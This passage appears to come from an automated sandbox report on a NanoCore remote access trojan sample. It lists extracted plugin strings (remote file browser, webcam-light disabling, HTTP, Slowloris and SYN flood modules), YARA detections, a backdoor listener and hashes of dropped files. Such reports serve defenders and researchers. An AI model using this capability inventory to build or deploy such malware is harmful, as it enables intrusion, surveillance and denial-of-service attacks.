teAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: RegSvcs.exe, 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002D2163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		7_2_002D2163
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002D1B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		7_2_002D1B61

Windows Analysis Report
P05jmXYKpr.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	877862
Product:	CloudBasic
Start time:	06:21:06
Start date:	30.05.2023
Sample:	P05jmXYKpr.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	db555a9de355c70681e2e5f9ed38a335
SHA1:	07534d5012526f6bdec5314a4d140de5d94672ea
SHA256:	fb25c8a64c09f9c4e8c586b94d5cda1dc69be203b786ea297f9293d7bd7b8b30
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	2867A3817C9245F7CF518524DFD18F28	D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC	43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log	ASCII text, with CRLF line terminators	8C0458BB9EA02D50565175E38D577E35	F0B50702CD6470F3C17D637908F83212FDBDB2F2	C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log	ASCII text, with CRLF line terminators	8C0458BB9EA02D50565175E38D577E35	F0B50702CD6470F3C17D637908F83212FDBDB2F2	C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
C:\Users\user\AppData\Local\Temp\RarSFX0\Update-ta.l.vbe	Unicode text, UTF-16, little-endian text, with CRLF line terminators	998B0027EB59F3283BFBC0E95979CABD	8354C76C835B137935DC8B8576F1902F8670E868	44F0988D28CF5474A366DEB9CEC3B2BE6AB506AE55656D16A9E826DB5980257D
C:\Users\user\AppData\Local\Temp\RarSFX0\Update.vbs	ASCII text, with no line terminators	4B6F1A54F2823912817EF376AF2CB300	5DA8FDC368156CE4DBBAF8FC8883AC3D0D1CEF62	2D77855D782CC56D8C74ECA587E851483F9869AF112A830B1FBDA9FE1FD808D3
C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	PE32 executable (GUI) Intel 80386, for MS Windows	D70543055E19B63641C7D5CB908EAEC7	C4CE358B96ACCF34B885B56E49F242B847FBDC6B	CFC03A739220BEF4F9BDE940B1CEEA4E3041DD7C1129C72F0EACC25CD76D0106
C:\Users\user\AppData\Local\Temp\RarSFX0\cjeugvqj.txt	ASCII text, with CRLF line terminators	FDA2888020565226936033992B8E7F65	5BA9FB1FBEE9FCEF4D09781EB246F560BC2D4A55	90AED0CA38C37473AC9761508F946E730391F00CCB01CB71B9573D2E64E9418E
C:\Users\user\AppData\Local\Temp\RarSFX0\dnggql.bin	ASCII text, with CRLF line terminators	CCBEF5AB9429D5D0A42C1291DF553332	29C9B657160C76AB7DE342CD64118E16EACC516A	6DEBB303DD0986A0A24FF2D14FBF69D5B776E88AD5D69BEF457D9FEB0584C4AB
C:\Users\user\AppData\Local\Temp\RarSFX0\draovqnp.ppt	ASCII text, with CRLF line terminators	2464923D96F4CCB9E514843726D4699D	0E59D7286245F567E91B4BA826CB19015F807C91	979CEE496158E406A273787C20B85C747B42371FB2C0B7C391EC39FF1514614E
C:\Users\user\AppData\Local\Temp\RarSFX0\ggqkqbgc.xl	ASCII text, with CRLF line terminators	BF23A7ED26731B18D7922F9E6EE71B8D	D7A835667E4CFDA4B92DC012CCD2B8AB58EA11B2	FFC2B93B6811894CA06BD693F2D6E05404871C24A0C4F49E262739BA2B84B28B
C:\Users\user\AppData\Local\Temp\RarSFX0\gmbxvlkihm.msc	ASCII text, with CRLF line terminators	099A4822E2671902FC6CE161F8DA4ABA	526560B54C15AA7FF768303AF92F13FC18C5F7B6	CF28AFC0668594A95AFDBC78BEA31BED8B6F1B0EB15EFEB695E67B4CBE00C24D
C:\Users\user\AppData\Local\Temp\RarSFX0\gsau.dll	ASCII text, with CRLF line terminators	9A7680A212F373D14BFABDB65B2E0E24	C6C6C05B6F02D5BD75D8D6D2F36688697F44A16F	AFE60D1645A8A9326C30A79B3673FCCE74EA88E9E17EBFB159641E45E6DA62BE
C:\Users\user\AppData\Local\Temp\RarSFX0\hsfcsirb.msc	ASCII text, with CRLF line terminators	ED8B39554FA55A099A30D463C71E38BA	1A16C296614A7E57A3E7B92C06B6BD36734BDE2A	E1403D1D1E752FB0CD4995B103DE41CC354070AC460EC2FA63CCAC5DE9380A20
C:\Users\user\AppData\Local\Temp\RarSFX0\ikvvfncnn.bmp	data	224353FCD92D49B9DFC259E1DC19A5E9	1EC921E5F5F2C5577F0633F83EFF1D315DB013F3	209F04E9B26AA11D09821B11FB325D6D52989AC730369DAD2FB25464BE48B5D9
C:\Users\user\AppData\Local\Temp\RarSFX0\jqdgnhnhre.xml	ASCII text, with CRLF line terminators	F6C7C5A49B0EADC97C63131991202F58	0F3D4CA96FE7DF872A4353BEC03C349AA889C869	60311BCA5CB7E4011CF68AB3A5923BC834ADBD79C0840290C443E019C4188FCE
C:\Users\user\AppData\Local\Temp\RarSFX0\nhoxu.docx	ASCII text, with CRLF line terminators	D4E1AAB6991C0C1AF02C7F16D6EB9458	A047C8DC248DE5E857F0A4039D24D53485B27350	FDBAA2EDC1087277362099CB493A000A48D285AC598933A9828909F025F40280
C:\Users\user\AppData\Local\Temp\RarSFX0\nibh.ini	ASCII text, with CRLF line terminators	09E859F88E268DE999BAC15B79120559	FE05846EA36F415C9E9E3F073926FF312176A820	63D2909F815AD46DCA32B9617BC285172ADA6FCEBEA29DA8653F7FCF1657CBA0
C:\Users\user\AppData\Local\Temp\RarSFX0\prkwlrpwug.bmp	ASCII text, with CRLF line terminators	3350E3C8E8DAEB531E07F846AC0F142F	8C72765CC982F476D3ED953EE4297B4187937F3B	4A7517DAFB3C2AE545585328B979B09C7663E1264C80501DA23295D6220EA063
C:\Users\user\AppData\Local\Temp\RarSFX0\qbjxqxvrm.ini	ASCII text, with CRLF line terminators	0787094CCB9A5E8D7D2E294B14719444	0C4C9DE4B550461B3F5D80D1E8FE9CEE6F3F912E	C09D173EC6444B7428B92EB564C62C5FFE2281DF63EC084B3188C539521DA1E9
C:\Users\user\AppData\Local\Temp\RarSFX0\shjgtph.kmt	ASCII text, with very long lines (65536), with no line terminators	C652D22B20629DCD29146B09FF90C5B7	FC05A29D60E34ED153BF5C5B257460B85967BD0F	8245A77BC68A9B141B318066C6BD305825AA175823D7BF6A6D1B79DB198A328F
C:\Users\user\AppData\Local\Temp\RarSFX0\siwhtkxo.txt	ASCII text, with CRLF line terminators	471D3AFC0D2E98211F74B782365D9CFE	6061119FFEEB9B3E2494C768C5645A2309264EEC	D8422D1C7730CFCABBEF0BE0938EA1B4426407F2A3174B109BAFDE30B1325882
C:\Users\user\AppData\Local\Temp\RarSFX0\tsxgodcl.msc	ASCII text, with CRLF line terminators	C673799ABFD1A91853D69D6E538C94A5	5B7DBEF81362B2CA98D652B06480D1F3A6EF0AB8	D32CE2F369FBDB301993F7EC754DD25BA7D55DEF3DB224EEC986B2D795EE5162
C:\Users\user\AppData\Local\Temp\RarSFX0\vmxmpsfs.msc	ASCII text, with CRLF line terminators	4165825E78065EEDC9C64FA7575876E0	549C00FFC79FDBF22121BA54D4B01C68126488BF	7804BC05082A390CFFC4EF8C8F0856C5190BE6D85912241A2197CB9D17114130
C:\Users\user\AppData\Local\Temp\RarSFX0\xivqfmq.pdf	ASCII text, with CRLF line terminators	F711A97BE2732B8D02C95737C854A938	A5470B5154C2000D77D444AAD7E19939FC171DB5	4EBFEB846ED6CA27AC4CC8529EF902C9A56FB71B06E14E1514D96A21BC41D959
C:\Users\user\AppData\Local\Temp\RarSFX0\xwmakcb.docx	ASCII text, with CRLF line terminators	05A03ED5B3120B420092518601CC840C	8AF644D3093E0E6E1A81E3F0A2F478F0D4387D2B	DE18135659C53F7025CCE0FA6778B7397D83DA4CAAA9804AD311C6D67EC6FB23
C:\Users\user\AppData\Local\Temp\RegSvcs.exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	2867A3817C9245F7CF518524DFD18F28	D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC	43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
C:\Users\user\AppData\Local\Temp\tmpE45C.tmp	XML 1.0 document, ASCII text, with CRLF line terminators	211C08A48B92E556A855FB90EE4B0942	4E3ECFBEA0CCA0EE2743C0E23ED3FC79EB2E282A	21F529F720EE77AD03AFD3CFA4CE04EBAF243C3E752F14C268529665CA936146
C:\Users\user\AppData\Local\Temp\tmpE586.tmp	XML 1.0 document, ASCII text, with CRLF line terminators	5C2F41CFC6F988C859DA7D727AC2B62A	68999C85FC7E37BAB9216E0099836D40D4545C1C	98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat	data	061E700FE27D852034A5A44BF5985CCF	15B072DE6D6FDD92AE36F074345FA41985833E8D	4BBB88AF530693EB4A710B0591D4BAF585837242C5690F5A821BF2FC9CC587CD
C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat	data	C423895161CCF32B983D88DF7E278B61	945D1ECC89886799DC030BC511F5F8A1567CCE27	7FB989D7AB4EB7CD91C1448524B0734E5CB57B07D06C8A9F8350EE2D961A461E
C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin	data	ACD3FB4310417DC77FE06F15B0E353E6	80E7002E655EB5765FDEB21114295CB96AD9D5EB	DC3AE604991C9BB8FF8BC4502AE3D0DB8A3317512C0F432490B103B89C1A4368
C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat	data	0CA9956E5967CBD48189498803097888	6B0E6770D94C66479A57A0741CE2D4A582C544BA	535452B987718279A4606B726A3DB76C48C74D8D5D4D08D10272511CBC7EB756
C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat	ASCII text, with no line terminators	4879007AC97C3DF41896D937852ABBE7	05A8C8638A4C8157216EF4AE24B43D3A4E750F00	18B03E2D9F5F5E7E26686848D71049AC56D06500A2AB420A3A01CA0ED6C7AD18
C:\Users\user\temp\cjeugvqj.txt	ASCII text, with CRLF line terminators	05F06C28F5D955691BED4FBDC37385D3	0DFAEC0DDEDE341CDF6896BCBF8A6F710FA28E9E	9C8BB284A5642CEF5D7A6B4BAB1606D8E444B5D33961EDA0EB6A6D53E09A35EA
\Device\ConDrv	ASCII text, with CRLF, LF line terminators	623152A30E4F18810EB8E046163DB399	5D640A976A0544E2DDA22E9DF362F455A05CFF2A	4CA51BAF6F994B93FE9E1FDA754A4AE74277360C750C04B630DA3DEC33E65FEA

Windows Analysis Report P05jmXYKpr.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
P05jmXYKpr.exe

Malware Threat Intel
Provided by